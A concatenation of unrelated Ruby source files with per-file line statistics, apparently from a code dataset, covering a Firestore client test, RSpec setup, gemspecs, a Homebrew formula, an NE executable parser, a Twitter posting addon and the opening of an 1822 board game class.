assert_equal "hello world", request["document_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::Document), request["document"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_document_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_document({ parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_document parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_document ::Google::Cloud::Firestore::V1::CreateDocumentRequest.new(parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.create_document({ parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_document ::Google::Cloud::Firestore::V1::CreateDocumentRequest.new(parent: parent, collection_id: collection_id, document_id: document_id, document: document, mask: mask), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_document_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::Firestore::V1::Firestore::Client::Configuration, config
end
end
| 43.315556 | 301 | 0.713195 |
87857eab7ec67260b7720954340edd4c5723dd8f | 2,522 | ENV['RAILS_ENV'] ||= 'test'
# Load the plain RSpec defaults first, then boot the full Rails environment.
require 'spec_helper'
require File.expand_path('../../config/environment', __FILE__)
require 'capybara/rails'
require 'rspec/rails'
require 'sidekiq/testing'
# Queue Sidekiq jobs in memory instead of executing them during specs.
Sidekiq::Testing.fake!
# Add additional requires below this line. Rails is not loaded until this point!

# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }

# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
  # Make the Capybara DSL (visit, page, ...) available in specs.
  config.include Capybara::DSL
  # FactoryGirl shorthand (create/build/...) without the FactoryGirl prefix.
  config.include FactoryGirl::Syntax::Methods

  # Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
  config.fixture_path = "#{::Rails.root}/spec/fixtures"

  # If you're not using ActiveRecord, or you'd prefer not to run each of your
  # examples within a transaction, remove the following line or assign false
  # instead of true.
  config.use_transactional_fixtures = true

  # RSpec Rails can automatically mix in different behaviours to your tests
  # based on their file location, for example enabling you to call `get` and
  # `post` in specs under `spec/controllers`.
  #
  # You can disable this behaviour by removing the line below, and instead
  # explicitly tag your specs with their type, e.g.:
  #
  #     RSpec.describe UsersController, :type => :controller do
  #       # ...
  #     end
  #
  # The different available types are documented in the features, such as in
  # https://relishapp.com/rspec/rspec-rails/docs
  config.infer_spec_type_from_file_location!
end | 43.482759 | 80 | 0.748216 |
e2b516a3d546a321609d60217febdecd8cb946f1 | 995 | module GraphQL
module SchemaComparator
module Diff
class DirectiveArgument
def initialize(directive, old_arg, new_arg)
@directive = directive
@old_arg = old_arg
@new_arg = new_arg
end
def diff
changes = []
if old_arg.description != new_arg.description
changes << Changes::DirectiveArgumentDescriptionChanged.new(directive, old_arg, new_arg)
end
if old_arg.default_value != new_arg.default_value
changes << Changes::DirectiveArgumentDefaultChanged.new(directive, old_arg, new_arg)
end
if old_arg.type.to_type_signature != new_arg.type.to_type_signature
changes << Changes::DirectiveArgumentTypeChanged.new(directive, old_arg, new_arg)
end
# TODO directives on directive arguments
changes
end
private
attr_reader(:directive, :new_arg, :old_arg)
end
end
end
end
| 26.184211 | 100 | 0.627136 |
f77641b35037791a00bdc24a5325202b7163d136 | 835 | require 'test/unit'
require "-test-/bignum"
class TestBignum < Test::Unit::TestCase
  # Exercises the internal string-to-bignum conversion entry points exposed by
  # the -test-/bignum C extension. Each test parses "1" followed by 1000 zeros
  # in a given base and compares against the equivalent Integer power.
  class TestStr2big < Test::Unit::TestCase
    SIZEOF_BDIGITS = Bignum::SIZEOF_BDIGITS
    BITSPERDIG = Bignum::BITSPERDIG
    BDIGMAX = (1 << BITSPERDIG) - 1 # largest value of a single bignum digit

    # Base 16 is a power of two, so the power-of-two parser applies.
    def test_str2big_poweroftwo
      s = "1" + "0" * 1000
      n = 16 ** 1000
      assert_equal(n, s.str2big_poweroftwo(16, true))
    end

    def test_str2big_normal
      s = "1" + "0" * 1000
      n = 10 ** 1000
      assert_equal(n, s.str2big_normal(10, true))
    end

    def test_str2big_karatsuba
      s = "1" + "0" * 1000
      n = 10 ** 1000
      assert_equal(n, s.str2big_karatsuba(10, true))
    end

    def test_str2big_gmp
      s = "1" + "0" * 1000
      n = 10 ** 1000
      assert_equal(n, s.str2big_gmp(10, true))
    rescue NotImplementedError
      # Ruby may be built without GMP; treat the conversion as unsupported.
    end
  end
end
| 21.973684 | 53 | 0.60479 |
b96f717165824b0bbf0d87a859079018907b0508 | 1,354 | class Libxaw < Formula
desc "X.Org: X Athena Widget Set"
homepage "https://www.x.org/"
url "https://www.x.org/archive/individual/lib/libXaw-1.0.14.tar.bz2"
sha256 "76aef98ea3df92615faec28004b5ce4e5c6855e716fa16de40c32030722a6f8e"
license "MIT"
bottle do
sha256 arm64_big_sur: "6f9bd6bef10340da3fc23f24d0c4a4e3358dcbada118a8b74c4e05d901ac0dd6"
sha256 big_sur: "bceab125f7dc2fde90b23c68daf8d3a6b5fff65a0f3f3895abe750a74a328dc6"
sha256 catalina: "345ff906f7375ae71a550298fd482c849994ed25d0263822fe7ce8f3740db9f2"
sha256 mojave: "16cd8aec41f9df9798704213ac41b7e9013d1a8af9f4bda90bfb13d50e55f057"
end
depends_on "pkg-config" => :build
depends_on "libx11"
depends_on "libxext"
depends_on "libxmu"
depends_on "libxpm"
depends_on "libxt"
def install
args = %W[
--prefix=#{prefix}
--sysconfdir=#{etc}
--localstatedir=#{var}
--disable-dependency-tracking
--disable-silent-rules
--enable-specs=no
]
system "./configure", *args
system "make"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include "X11/Xaw/Text.h"
int main(int argc, char* argv[]) {
XawTextScrollMode mode;
return 0;
}
EOS
system ENV.cc, "test.c"
assert_equal 0, $CHILD_STATUS.exitstatus
end
end
| 27.08 | 92 | 0.692762 |
bfe9e2849b5f64577e0331d91709e1b39a3031c3 | 1,443 | # -*- encoding: utf-8 -*-
# stub: activemodel 5.1.6 ruby lib

# Auto-generated gemspec stub (note the "stub:" marker above), typically
# written by RubyGems at install time — edit with care.
Gem::Specification.new do |s|
  s.name = "activemodel"
  s.version = "5.1.6"

  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.metadata = { "changelog_uri" => "https://github.com/rails/rails/blob/v5.1.6/activemodel/CHANGELOG.md", "source_code_uri" => "https://github.com/rails/rails/tree/v5.1.6/activemodel" } if s.respond_to? :metadata=
  s.require_paths = ["lib"]
  s.authors = ["David Heinemeier Hansson"]
  s.date = "2018-03-29"
  s.description = "A toolkit for building modeling frameworks like Active Record. Rich support for attributes, callbacks, validations, serialization, internationalization, and testing."
  s.email = "[email protected]"
  s.homepage = "http://rubyonrails.org"
  s.licenses = ["MIT"]
  s.required_ruby_version = Gem::Requirement.new(">= 2.2.2")
  s.rubygems_version = "2.5.1"
  s.summary = "A toolkit for building modeling frameworks (part of Rails)."

  s.installed_by_version = "2.5.1" if s.respond_to? :installed_by_version

  # Declare the activesupport dependency in a way that works across old
  # RubyGems versions.
  if s.respond_to? :specification_version then
    s.specification_version = 4

    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_runtime_dependency(%q<activesupport>, ["= 5.1.6"])
    else
      s.add_dependency(%q<activesupport>, ["= 5.1.6"])
    end
  else
    s.add_dependency(%q<activesupport>, ["= 5.1.6"])
  end
end
| 41.228571 | 214 | 0.694387 |
62790ed47adbe86527a585c9fb51597940db4c64 | 945 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
  module Apis
    # Version constants for the generated Chrome Management V1 API client.
    module ChromemanagementV1
      # Version of the google-apis-chromemanagement_v1 gem
      GEM_VERSION = "0.13.0"

      # Version of the code generator used to generate this client
      GENERATOR_VERSION = "0.4.0"

      # Revision of the discovery document this client was generated from
      REVISION = "20211112"
    end
  end
end
| 32.586207 | 74 | 0.733333 |
1a0c71cda5d503e674cf947f92223847150bc2a3 | 13,104 | class PEdump
# from wine's winnt.h
class NE < IOStruct.new 'a2CCvvVv4VVv8Vv3CCv4',
:ne_magic, # 00 NE signature 'NE'
:ne_ver, # 02 Linker version number
:ne_rev, # 03 Linker revision number
:ne_enttab, # 04 Offset to entry table relative to NE
:ne_cbenttab, # 06 Length of entry table in bytes
:ne_crc, # 08 Checksum
:ne_flags, # 0c Flags about segments in this file
:ne_autodata, # 0e Automatic data segment number
:ne_heap, # 10 Initial size of local heap
:ne_stack, # 12 Initial size of stack
:ne_csip, # 14 Initial CS:IP
:ne_sssp, # 18 Initial SS:SP
:ne_cseg, # 1c # of entries in segment table
:ne_cmod, # 1e # of entries in module reference tab.
:ne_cbnrestab, # 20 Length of nonresident-name table
:ne_segtab, # 22 Offset to segment table
:ne_rsrctab, # 24 Offset to resource table
:ne_restab, # 26 Offset to resident-name table
:ne_modtab, # 28 Offset to module reference table
:ne_imptab, # 2a Offset to imported name table
:ne_nrestab, # 2c Offset to nonresident-name table
:ne_cmovent, # 30 # of movable entry points
:ne_align, # 32 Logical sector alignment shift count
:ne_cres, # 34 # of resource segments
:ne_exetyp, # 36 Flags indicating target OS
:ne_flagsothers, # 37 Additional information flags
:ne_pretthunks, # 38 Offset to return thunks
:ne_psegrefbytes, # 3a Offset to segment ref. bytes
:ne_swaparea, # 3c Reserved by Microsoft
:ne_expver # 3e Expected Windows version number
attr_accessor :io, :offset
DEFAULT_CP = 1252
def self.cp
@@cp || DEFAULT_CP
end
def self.cp= cp
@@cp = cp
end
def self.read io, *args
self.cp = DEFAULT_CP
offset = io.tell
super.tap do |x|
x.io, x.offset = io, offset
end
end
class Segment < IOStruct.new 'v4',
:offset, :size, :flags, :min_alloc_size,
# manual:
:file_offset, :relocs
FLAG_RELOCINFO = 0x100
def data?
flags & 1 == 1
end
def code?
!data?
end
def flags_desc
r = code? ? 'CODE' : 'DATA'
r << ' ALLOC' if flags & 2 != 0
r << ' LOADED' if flags & 4 != 0
r << ((flags & 0x10 != 0) ? ' MOVABLE' : ' FIXED')
r << ((flags & 0x20 != 0) ? ' PURE' : '')
r << ((flags & 0x40 != 0) ? ' PRELOAD' : '')
if code?
r << ((flags & 0x80 != 0) ? ' EXECUTEONLY' : '')
else
r << ((flags & 0x80 != 0) ? ' READONLY' : '')
end
r << ((flags & FLAG_RELOCINFO != 0) ? ' RELOCINFO' : '')
r << ((flags & 0x200 != 0) ? ' DBGINFO' : '')
r << ((flags & 0x1000 != 0) ? ' DISCARD' : '')
r
end
end
class Reloc < IOStruct.new 'CCvvv',
:source, :type,
:offset, # offset of the relocation item within the segment
# If the relocation type is imported ordinal,
# the fifth and sixth bytes specify an index to a module's reference table and
# the seventh and eighth bytes specify a function ordinal value.
# If the relocation type is imported name,
# the fifth and sixth bytes specify an index to a module's reference table and
# the seventh and eighth bytes specify an offset to an imported-name table.
:module_idx,
:func_idx
TYPE_IMPORTORDINAL = 1
TYPE_IMPORTNAME = 2
end
def segments io=@io
@segments ||= io &&
begin
io.seek ne_segtab+@offset
ne_cseg.times.map{ Segment.read(io) }.each do |seg|
seg.file_offset = seg.offset << ne_align
seg.relocs = []
if (seg.flags & Segment::FLAG_RELOCINFO) != 0
io.seek seg.file_offset + seg.size
nRelocs = io.read(2).unpack('v').first
seg.relocs = nRelocs.times.map{ Reloc.read(io) }
end
end
end
end
class ResourceGroup < IOStruct.new 'vvV',
:type_id, :count, :reserved,
# manual:
:type, :children
def self.read io
super.tap do |g|
if g.type_id.to_i == 0
# type_id = 0 means end of resource groups
return nil
else
# read only if type_id is non-zero,
g.children = []
g.count.times do
break if io.eof?
g.children << ResourceInfo.read(io)
end
end
end
end
end
class ResourceInfo < IOStruct.new 'v4V',
:offset, :size, :flags, :name_offset, :reserved,
# manual:
:name
end
class Resource < PEdump::Resource
# NE strings use 8-bit characters
def parse f, h={}
self.data = []
case type
when 'STRING'
f.seek file_offset
16.times do
break if f.tell >= file_offset+self.size
nChars = f.getc.ord
t =
if nChars + 1 > self.size
# TODO: if it's not 1st string in table then truncated size must be less
PEdump.logger.error "[!] string size(#{nChars*2}) > stringtable size(#{self.size}). truncated to #{self.size-2}"
f.read(self.size-1)
else
f.read(nChars)
end
data <<
begin
t.force_encoding("CP#{h[:cp]}").encode!('UTF-8')
rescue
t.force_encoding('ASCII')
end
end
when 'VERSION'
f.seek file_offset
data << PEdump::NE::VS_VERSIONINFO.read(f)
else
super(f)
end
end
end
def _id2string id, io, res_base
if id & 0x8000 == 0
# offset to name
io.seek id + res_base
namesize = (io.getc || 0.chr).ord
io.read(namesize)
else
# numerical id
"##{id & 0x7fff}"
end
end
def resource_directory io=@io
@resource_directory ||=
begin
res_base = ne_rsrctab+@offset
io.seek res_base
res_shift = io.read(2).unpack('v').first
unless (0..16).include?(res_shift)
PEdump.logger.error "[!] invalid res_shift = %d" % res_shift
return []
end
PEdump.logger.info "[.] res_shift = %d" % res_shift
r = []
while !io.eof? && (g = ResourceGroup.read(io))
r << g
end
r.each do |g|
g.type = (g.type_id & 0x8000 != 0) && PEdump::ROOT_RES_NAMES[g.type_id & 0x7fff]
g.type ||= _id2string( g.type_id, io, res_base)
g.children.each do |res|
res.name = _id2string(res.name_offset, io, res_base)
res.offset ||= 0
res.offset <<= res_shift
res.size ||= 0
res.size <<= res_shift
end
end
r
end
end
def _detect_codepage a, io=@io
a.find_all{ |res| res.type == 'VERSION' }.each do |res|
res.parse(io)
res.data.each do |vi|
if vi.respond_to?(:Children) && vi.Children.respond_to?(:each)
# vi is PEdump::NE::VS_VERSIONINFO
vi.Children.each do |vfi|
if vfi.is_a?(PEdump::NE::VarFileInfo) && vfi.Children.is_a?(PEdump::NE::Var)
var = vfi.Children
# var is PEdump::NE::Var
if var.respond_to?(:Value) && var.Value.is_a?(Array) && var.Value.size == 2
return var.Value.last
end
end
end
end
end
end
nil
end
def resources io=@io
a = []
resource_directory(io).each do |grp|
grp.children.each do |res|
a << (r = Resource.new)
r.id = (res.name_offset & 0x7fff) if (res.name_offset & 0x8000) != 0
r.type = grp.type
r.size = res.size
r.name = res.name
r.file_offset = res.offset
r.reserved = res.reserved
end
end
# try to detect codepage
cp = _detect_codepage(a, io)
if cp
PEdump::NE.cp = cp # XXX HACK
PEdump.logger.info "[.] detect_codepage: #{cp.inspect}"
else
cp = DEFAULT_CP
PEdump.logger.info "[.] detect_codepage failed, using default #{cp}"
end
a.each{ |r| r.parse(io, :cp => cp) }
a
end
def imports io=@io
@imports ||=
begin
io.seek @offset+ne_modtab
modules = io.read(2*ne_cmod).unpack('v*')
modules.map! do |ofs|
io.seek @offset+ne_imptab+ofs
namelen = io.getc.ord
io.read(namelen)
end
r = []
segments(io).each do |seg|
seg.relocs.each do |rel|
if rel.type == Reloc::TYPE_IMPORTORDINAL
r << (f = PEdump::ImportedFunction.new)
f.module_name = modules[rel.module_idx-1]
f.ordinal = rel.func_idx
elsif rel.type == Reloc::TYPE_IMPORTNAME
r << (f = PEdump::ImportedFunction.new)
f.module_name = modules[rel.module_idx-1]
io.seek @offset+ne_imptab+rel.func_idx
namelen = io.getc.ord
f.name = io.read(namelen)
end
end
end
r
end
end
# first string with ordinal 0 is a module name
def exports io=@io
exp_dir = IMAGE_EXPORT_DIRECTORY.new
exp_dir.functions = []
io.seek @offset+ne_restab
while !io.eof && (namelen = io.getc.ord) > 0
exp_dir.functions << ExportedFunction.new( io.read(namelen), io.read(2).unpack('v').first, 0 )
end
exp_dir.name = exp_dir.functions.shift.name if exp_dir.functions.any?
a = []
io.seek ne_nrestab
while !io.eof && (namelen = io.getc.ord) > 0
a << ExportedFunction.new( io.read(namelen), io.read(2).unpack('v').first, 0 )
end
exp_dir.description = a.shift.name if a.any?
exp_dir.functions += a
exp_dir.functions.each do |f|
f.va = entrypoints[f.ord]
end
exp_dir
end
# The entry-table data is organized by bundle, each of which begins with a 2-byte header.
# The first byte of the header specifies the number of entries in the bundle ( 0 = end of the table).
# The second byte specifies whether the corresponding segment is movable or fixed.
# 0xFF = the segment is movable.
# 0xFE = the entry does not refer to a segment but refers to a constant defined within the module.
# else it is a segment index.
class Bundle < IOStruct.new 'CC', :num_entries, :seg_idx,
:entries # manual
FixedEntry = IOStruct.new 'Cv', :flag, :offset
MovableEntry = IOStruct.new 'CvCv', :flag, :int3F, :seg_idx, :offset
def movable?
seg_idx == 0xff
end
def self.read io
super.tap do |bundle|
return nil if bundle.num_entries == 0
if bundle.num_entries == 0
@@eob ||= 0
@@eob += 1
return nil if @@eob == 2
end
bundle.entries = bundle.seg_idx == 0 ? [] :
if bundle.movable?
bundle.num_entries.times.map{ MovableEntry.read(io) }
else
bundle.num_entries.times.map{ FixedEntry.read(io) }
end
end
end
end
def bundles io=@io
io.seek @offset+ne_enttab
bundles = []
while bundle = Bundle.read(io)
bundles << bundle
end
bundles
end
def entrypoints io=@io
@entrypoints ||=
begin
r = [0] # entrypoint indexes are 1-based
bundles(io).each do |b|
if b.entries.empty?
b.num_entries.times{ r<<0 }
else
b.entries.each do |e|
if e.is_a?(Bundle::MovableEntry)
r << (e.seg_idx<<16) + e.offset
elsif e.is_a?(Bundle::FixedEntry)
r << (b.seg_idx<<16) + e.offset
else
raise "invalid ep #{e.inspect}"
end
end
end
end
r
end
end
end
  # Reads the NE header pointed to by the MZ header's e_lfanew field.
  # Memoizes the result; returns nil (with a log entry) when there is no MZ
  # header, the offset is missing or beyond EOF, or the 'NE' signature does
  # not match.
  def ne f=@io
    return @ne if defined?(@ne)
    @ne ||=
      begin
        ne_offset = mz(f) && mz(f).lfanew
        if ne_offset.nil?
          logger.debug "[!] NULL NE offset (e_lfanew)."
          nil
        elsif ne_offset > f.size
          logger.fatal "[!] NE offset beyond EOF."
          nil
        else
          f.seek ne_offset
          if f.read(2) == 'NE'
            # signature matched: rewind and parse the full header
            f.seek ne_offset
            NE.read f
          else
            nil
          end
        end
      end
  end
| 30.760563 | 128 | 0.514957 |
182b904e9a307936dc848a4dee86067dd88f9316 | 1,212 | # -*- encoding: utf-8 -*-
# stub: mongoid_rateable 0.3.3 ruby lib

require File.expand_path('../lib/mongoid_rateable/version', __FILE__)

Gem::Specification.new do |s|
  s.name = "mongoid_rateable"
  s.version = MongoidRateable::VERSION

  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib"]
  s.authors = ["Peter Savichev (proton)"]
  s.date = "2014-06-21"
  s.description = "Provides fields and methods for the rating manipulation on Mongoid documents."
  s.email = "[email protected]"
  s.extra_rdoc_files = [
    "LICENSE.txt",
    "README.rdoc",
    "TODO"
  ]
  # BUGFIX: was `split($\)` — $\ is the *output* record separator, which is
  # nil by default, so the list was split on any whitespace and would break
  # paths containing spaces. `git ls-files` emits one path per line, so split
  # on newlines explicitly.
  s.files = `git ls-files`.split("\n")
  s.homepage = "http://github.com/proton/mongoid_rateable"
  s.licenses = ["MIT"]
  s.rubygems_version = "2.2.2"
  s.summary = "Rating functionality for Mongoid documents"

  s.add_runtime_dependency("mongoid", '~> 5.0')
  s.add_dependency("bundler", "~> 1")
  s.add_development_dependency("jeweler", "~> 1.6")
  s.add_development_dependency("simplecov", "~> 0.4")
  s.add_development_dependency("rdoc", "~> 3")
  s.add_development_dependency("rspec", "~> 2.0")
  s.add_development_dependency("database_cleaner", "~> 0")
end
| 32.756757 | 105 | 0.690594 |
7a314bca7b31a12994a7da0170d435c541b0e95b | 602 | Gem::Specification.new do |spec|
spec.name = "glpl"
spec.version = "0.2.0"
spec.date = Time.now.strftime("%Y-%m-%d")
spec.summary = "Gitlab Pipelines on your command line."
spec.description = "Gitlab Pipelines on your command line."
spec.authors = ["Dino"]
spec.email = "[email protected]"
spec.files = ["lib/glpl.rb"] + Dir["lib/glpl/*.rb"]
spec.license = "MIT"
spec.homepage = "https://github.com/joaofcosta/glpl"
spec.metadata = {"source_code_url" => "https://github.com/joaofcosta/glpl"}
spec.executables << "glpl"
end
| 40.133333 | 81 | 0.619601 |
ac90a7f71b038c28104fef378ef82865d425618c | 5,215 | module Cms::Addon
module TwitterPoster
extend ActiveSupport::Concern
include Cms::Content
extend SS::Addon
# media_ids is restricted up to 4
# see: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-update
TWITTER_MAX_MEDIA_COUNT = 4
included do
attr_accessor :skip_twitter_post
field :twitter_auto_post, type: String
field :twitter_post_format, type: String
field :twitter_edit_auto_post, type: String
field :twitter_posted, type: Array, default: [], metadata: { branch: false }
field :twitter_post_error, type: String, metadata: { branch: false }
permit_params :twitter_auto_post, :twitter_edit_auto_post, :twitter_post_format, :twitter_post_id, :twitter_user_id
validate :validate_twitter_postable, if: -> { twitter_auto_post == "active" }
after_save -> { post_to_twitter(execute: :job) }
end
def twitter_auto_post_options
%w(expired active).map { |v| [I18n.t("ss.options.state.#{v}"), v] }
end
def twitter_post_format_options
I18n.t("cms.options.twitter_post_format").map { |k, v| [v, k] }
end
def twitter_edit_auto_post_options
%w(disabled enabled).map { |v| [I18n.t("ss.options.state.#{v}"), v] }
end
def use_twitter_post?
twitter_auto_post == "active"
end
def twitter_edit_auto_post_enabled?
twitter_edit_auto_post == "enabled"
end
def twitter_url(post_id, user_id)
"https://twitter.com/#{user_id}/status/#{post_id}" if
use_twitter_post? && user_id.present? && post_id.present?
end
def twitter_post_enabled?
token_enabled = (site || @cur_site).try(:twitter_token_enabled?)
return false if !token_enabled
return false if skip_twitter_post.present?
return false if !use_twitter_post?
return false if respond_to?(:branch?) && branch?
if twitter_edit_auto_post_enabled?
# 再編集が有効の為、すでに投稿済みかをチェックしない。
else
return false if twitter_posted.present?
end
true
end
def connect_twitter
Twitter::REST::Client.new do |config|
config.consumer_key = self.site.twitter_consumer_key
config.consumer_secret = self.site.twitter_consumer_secret
config.access_token = self.site.twitter_access_token
config.access_token_secret = self.site.twitter_access_token_secret
end
end
def post_to_twitter(execute: :inline)
return unless public?
return unless public_node?
return if @posted_to_twitter
if twitter_post_enabled?
if execute == :job
Cms::SnsPost::TwitterJob.bind(site_id: @cur_site, user_id: @cur_user).perform_later(id)
else
execute_post_to_twitter
end
end
@posted_to_twitter = true
end
private
def validate_twitter_postable
policy = SS::UploadPolicy.upload_policy
if policy
msg = I18n.t("errors.messages.denied_with_upload_policy", policy: I18n.t("ss.options.upload_policy.#{policy}"))
errors.add :base, "#{t(:twitter_auto_post)}:#{msg}"
return
end
if twitter_post_format == "thumb_and_page" && thumb.blank?
errors.add :thumb_id, :blank
end
end
def execute_post_to_twitter
Cms::SnsPostLog::Twitter.create_with(self) do |log|
begin
posted_at = Time.zone.now
log.created = posted_at
message = "#{name}|#{full_url}?_=#{posted_at.to_i}"
client = connect_twitter
media_files = tweet_media_files
if media_files.present?
# 画像の添付があれば update_with_media を用いて投稿
log.action = "update_with_media"
log.message = message
log.media_files = media_files.map(&:path)
tweet = client.update_with_media(message, media_files)
else
# 画像の添付がなければ update を用いて投稿
log.action = "update"
log.message = message
tweet = client.update(message)
end
twitter_id = tweet.id
user_screen_id = client.user.screen_name
log.response_tweet = tweet.to_h.to_json
self.add_to_set(
twitter_posted: {
twitter_post_id: twitter_id.to_s,
twitter_user_id: user_screen_id,
posted_at: posted_at
}
)
self.unset(:twitter_edit_auto_post, :twitter_post_error) #編集時に投稿をリセット
log.state = "success"
rescue => e
Rails.logger.fatal("post_to_twitter failed: #{e.class} (#{e.message}):\n #{e.backtrace.join("\n ")}")
log.error = "post_to_twitter failed: #{e.class} (#{e.message}):\n #{e.backtrace.join("\n ")}"
self.set(twitter_post_error: "#{e.class} (#{e.message})")
end
end
end
def tweet_media_files
media_files = []
if twitter_post_format == "thumb_and_page" && thumb
media_files << thumb
elsif twitter_post_format == "files_and_page"
media_files = attached_files.select(&:image?).take(TWITTER_MAX_MEDIA_COUNT)
end
media_files.map { |file| ::File.new(file.path) }
end
end
end
| 31.79878 | 121 | 0.638926 |
6a7d2b110d3ae229ae15c16182daf6f5d88c8502 | 2,000 | # frozen_string_literal: true
module Members
class InviteEmailExperiment < ApplicationExperiment
exclude { context.actor.created_by.blank? }
exclude { context.actor.created_by.avatar_url.nil? }
INVITE_TYPE = 'initial_email'
def resolve_variant_name
RoundRobin.new(feature_flag_name, %i[avatar permission_info control]).execute
end
end
class RoundRobin
CacheError = Class.new(StandardError)
COUNTER_EXPIRE_TIME = 86400 # one day
def initialize(key, variants)
@key = key
@variants = variants
end
def execute
increment_counter
resolve_variant_name
end
# When the counter would expire
#
# @api private Used internally by SRE and debugging purpose
# @return [Integer] Number in seconds until expiration or false if never
def counter_expires_in
Gitlab::Redis::SharedState.with do |redis|
redis.ttl(key)
end
end
# Return the actual counter value
#
# @return [Integer] value
def counter_value
Gitlab::Redis::SharedState.with do |redis|
(redis.get(key) || 0).to_i
end
end
# Reset the counter
#
# @private Used internally by SRE and debugging purpose
# @return [Boolean] whether reset was a success
def reset!
redis_cmd do |redis|
redis.del(key)
end
end
private
attr_reader :key, :variants
# Increase the counter
#
# @return [Boolean] whether operation was a success
def increment_counter
redis_cmd do |redis|
redis.incr(key)
redis.expire(key, COUNTER_EXPIRE_TIME)
end
end
def resolve_variant_name
remainder = counter_value % variants.size
variants[remainder]
end
def redis_cmd
Gitlab::Redis::SharedState.with { |redis| yield(redis) }
true
rescue CacheError => e
Gitlab::AppLogger.warn("GitLab: An unexpected error occurred in writing to Redis: #{e}")
false
end
end
end
| 22.222222 | 94 | 0.6575 |
03ef600f269dd8185a51f010041ec80526b8e258 | 1,029 | require "spec_helper.rb"
module Huffman
describe Node do
context "with a particular binary tree" do
# We consider the tree example in the Readme
# 1
# / \
# 2 3
# / \ \
# 4 5 6
# / \ /
# 7 8 9
# Left part
n7 = Node.new(7)
n8 = Node.new(8)
n5 = Node.new(5,nil,n7,n8)
n4 = Node.new(4)
n2 = Node.new(2,nil,n4,n5)
# Right part
n9 = Node.new(9,nil)
n6 = Node.new(6,nil,n9)
n3 = Node.new(3,nil,nil,n6)
# Tree
tree = Node.new(1,nil,n2,n3)
it "can be visited by the preorder algorithm" do
tree.visit_and_map(:preorder){|node| node.value}.should == [1, 2, 4, 5, 7, 8, 3, 6, 9]
end
it "can be visited by the inorder algorithm" do
tree.visit_and_map(:inorder){|node| node.value}.should == [4, 2, 7, 5, 8, 1, 3, 9, 6]
end
it "can be visited by the postorder algorithm" do
tree.visit_and_map(:postorder){|node| node.value}.should == [4, 7, 8, 5, 2, 9, 6, 3, 1]
end
end
end
end | 23.930233 | 92 | 0.550049 |
91bdab97532b0fd97cc5e13c0e0744034ed7e1c1 | 77 | require 'test_helper'
# Placeholder test case for EqulpBoardHelper; no helper behavior covered yet.
class EqulpBoardHelperTest < ActionView::TestCase
end
| 15.4 | 49 | 0.831169 |
b9a9af6ecd8e5d8dacf9ce5b14feec55ee62d693 | 88 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'pry'
require 'todo'
| 22 | 58 | 0.715909 |
acca0005a6622ca146f314640027d1f2ffca5297 | 110,002 | # frozen_string_literal: true
require_relative 'meta'
require_relative '../base'
require_relative '../stubs_are_restricted'
module Engine
module Game
module G1822
class Game < Game::Base
include_meta(G1822::Meta)
register_colors(lnwrBlack: '#000',
gwrGreen: '#165016',
lbscrYellow: '#cccc00',
secrOrange: '#ff7f2a',
crBlue: '#5555ff',
mrRed: '#ff2a2a',
lyrPurple: '#2d0047',
nbrBrown: '#a05a2c',
swrGray: '#999999',
nerGreen: '#aade87',
black: '#000',
white: '#ffffff')
GAME_END_CHECK = { bank: :full_or, stock_market: :current_or }.freeze
BANKRUPTCY_ALLOWED = false
CURRENCY_FORMAT_STR = '£%d'
BANK_CASH = 12_000
CERT_LIMIT = { 3 => 26, 4 => 20, 5 => 16, 6 => 13, 7 => 11 }.freeze
